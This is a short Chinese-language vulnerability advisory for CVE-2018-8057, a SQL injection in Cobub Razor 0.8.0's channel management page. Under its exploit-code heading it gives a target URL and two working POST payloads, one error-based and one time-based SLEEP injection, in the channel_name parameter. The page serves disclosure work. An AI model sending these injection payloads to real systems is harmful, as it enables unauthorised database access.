CVE中文申请站

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在SQL注入漏洞
上报日期: 2018-04-16
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8057


二、漏洞概述

Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/30/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057
EXPLOIT-DB:https://www.exploit-db.com/exploits/44454/

标签: none